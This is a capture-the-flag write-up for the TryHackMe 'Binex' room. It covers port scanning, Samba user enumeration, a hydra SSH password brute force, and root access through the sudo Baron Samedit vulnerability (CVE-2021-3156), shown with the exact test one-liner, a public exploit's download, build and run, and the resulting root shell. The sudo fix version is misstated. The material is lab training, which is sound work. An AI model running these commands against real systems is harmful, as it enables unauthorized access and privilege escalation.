Binex Writeup CVE-2021-3156

Escalate your privileges by exploiting vulnerable binaries.

TryHackMe Binex created by DesKel

Enumerate the machine and get an interactive shell. Exploit an SUID bit file, use GNU debugger to take advantage of a buffer overflow and gain root access by PATH manipulation.

There are more points up for grabs in this room.

What are the login credential for initial access.

Answer format should be in username:password

Hint 1: RID range 1000-1003 Hint 2: The longest username has the unsecure password.

Step one, enumerate open ports and services running.

sudo nmap -sS -sV -T4 --open -Pn -p- 10.10.17.162

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 15:15 EST
Nmap scan report for 10.10.17.162
Host is up (0.15s latency).
Not shown: 65505 closed ports, 27 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: THM_EXPLOIT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds

NetBIOS/Samba running on ports 139 and 445. Enumerate the users and shared folders.

enum4linux 10.10.17.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 13 15:10:40 2021
[...]
 ======================================================================= 
|    Users on 10.10.17.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2007993849-1719925537-2372789573
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kel (Local User)
S-1-22-1-1001 Unix User\des (Local User)
S-1-22-1-1002 Unix User\tryhackme (Local User)
S-1-22-1-1003 Unix User\noentry (Local User)
[+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password ''
S-1-5-21-2007993849-1719925537-2372789573-500 *unknown*\*unknown* (8)
S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\nobody (Local User)
[...]
S-1-5-21-2007993849-1719925537-2372789573-513 THM_EXPLOIT\None (Domain Group)
[...]
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...]
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]

 ============================================= 
|    Getting printer info for 10.10.17.162    |
 ============================================= 
No printers returned.

enum4linux complete on Sat Mar 13 15:20:47 2021

Use hydra to do brute force on ssh service and gain the tryhackme password.

hydra -l tryhackme -P /usr/share/wordlists/rockyou.txt 10.10.17.162 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 15:38:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.17.162:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 14344223 to do in 1335:36h, 16 active
[STATUS] 113.00 tries/min, 339 tries in 00:03h, 14344063 to do in 2115:39h, 16 active
[STATUS] 117.00 tries/min, 819 tries in 00:07h, 14343583 to do in 2043:15h, 16 active
[22][ssh] host: 10.10.17.162   login: tryhackme   password: PASSWORD_TEXT
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 15:46:03

The easy way

By last January, the Qualys research team has discovered a heap overflow vulnerability, CVE-2021-3156, in sudo that allows any unprivileged user to gain root privileges on Linux without requiring a password. The CVE-2021-3156 vulnerability, introduced in 2011, was fixed in the latest version, sudo 9.5p2, and released on January 26, 2021.

CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)

If you are playing with some old CTF room, it is very possible that the machine is vulnerable to CVE-2021-3156.

This is not a new room, let’s test for Baron Sammedit. The test is simple and we can know if the machine is vulnerable.

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): memory corruption
Aborted (core dumped)

It is vulnerable.

There are an exploit done in github, and all our job is just download and use it.

https://github.com/blasty/CVE-2021-3156

From your local machine download the code of the exploit and compile with make.

wget https://github.com/blasty/CVE-2021-3156/archive/main.zip
--2021-03-13 15:57:52--  https://github.com/blasty/CVE-2021-3156/archive/main.zip
Resolving github.com (github.com)... 140.82.114.3
Connecting to github.com (github.com)|140.82.114.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [following]
--2021-03-13 15:57:52--  https://codeload.github.com/blasty/CVE-2021-3156/zip/main
Resolving codeload.github.com (codeload.github.com)... 140.82.114.9
Connecting to codeload.github.com (codeload.github.com)|140.82.114.9|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’

main.zip                                [ <=>                                                              ]   4.22K  --.-KB/s    in 0s      

2021-03-13 15:57:52 (8.88 MB/s) - ‘main.zip’ saved [4321]

unzip main.zip 
Archive:  main.zip
da68f7c1a2961595a3226b903f1fc180b8824255
   creating: CVE-2021-3156-main/
  inflating: CVE-2021-3156-main/Makefile  
  inflating: CVE-2021-3156-main/README.md  
  inflating: CVE-2021-3156-main/brute.sh  
  inflating: CVE-2021-3156-main/hax.c  
  inflating: CVE-2021-3156-main/lib.c  

cd CVE-2021-3156-main/

make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Start a local web server with python3

python3 -m http.server

From the room machine download the binaries, set the executable flag and run the exploit.

cat /etc/*release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

chmod +x -R *

./sudo-hax-me-a-sandwich 

** CVE-2021-3156 PoC by blasty <[email protected]>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <[email protected]>

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1002(tryhackme)

Done, you are root. Now just collects the flags and finish this room.

/bin/bash

# ls /root
root.txt
# cat /root/root.txt
The flag: ROOT_FLAG.
Also, thank you for your participation.

The room is built with love. DesKel out.
ls /home/des/      
bof  bof64.c  flag.txt

# cat /home/des/flag.txt 
Good job on exploiting the SUID file. Never assign +s to any system executable files. Remember, Check gtfobins.

You flag is DES_FLAG

login crdential (In case you need it)
username: des
password: DES_PASSWORD
ls /home/kel/          
exe  exe.c  flag.txt
[email protected]_exploit:/tmp/10.6.60.115:8000# cat /home/kel/flag.txt 
You flag is KEL_FLAG

The user credential
username: kel
password: KEL_PASSWORD

So guys and girls, this is done, was fast, but not beautiful, later I will try to finish this room in the right manner.

But also, it is important, to perceive that any not updated host can be vulnerable to this exploit and a simple test and update can prevent further damage.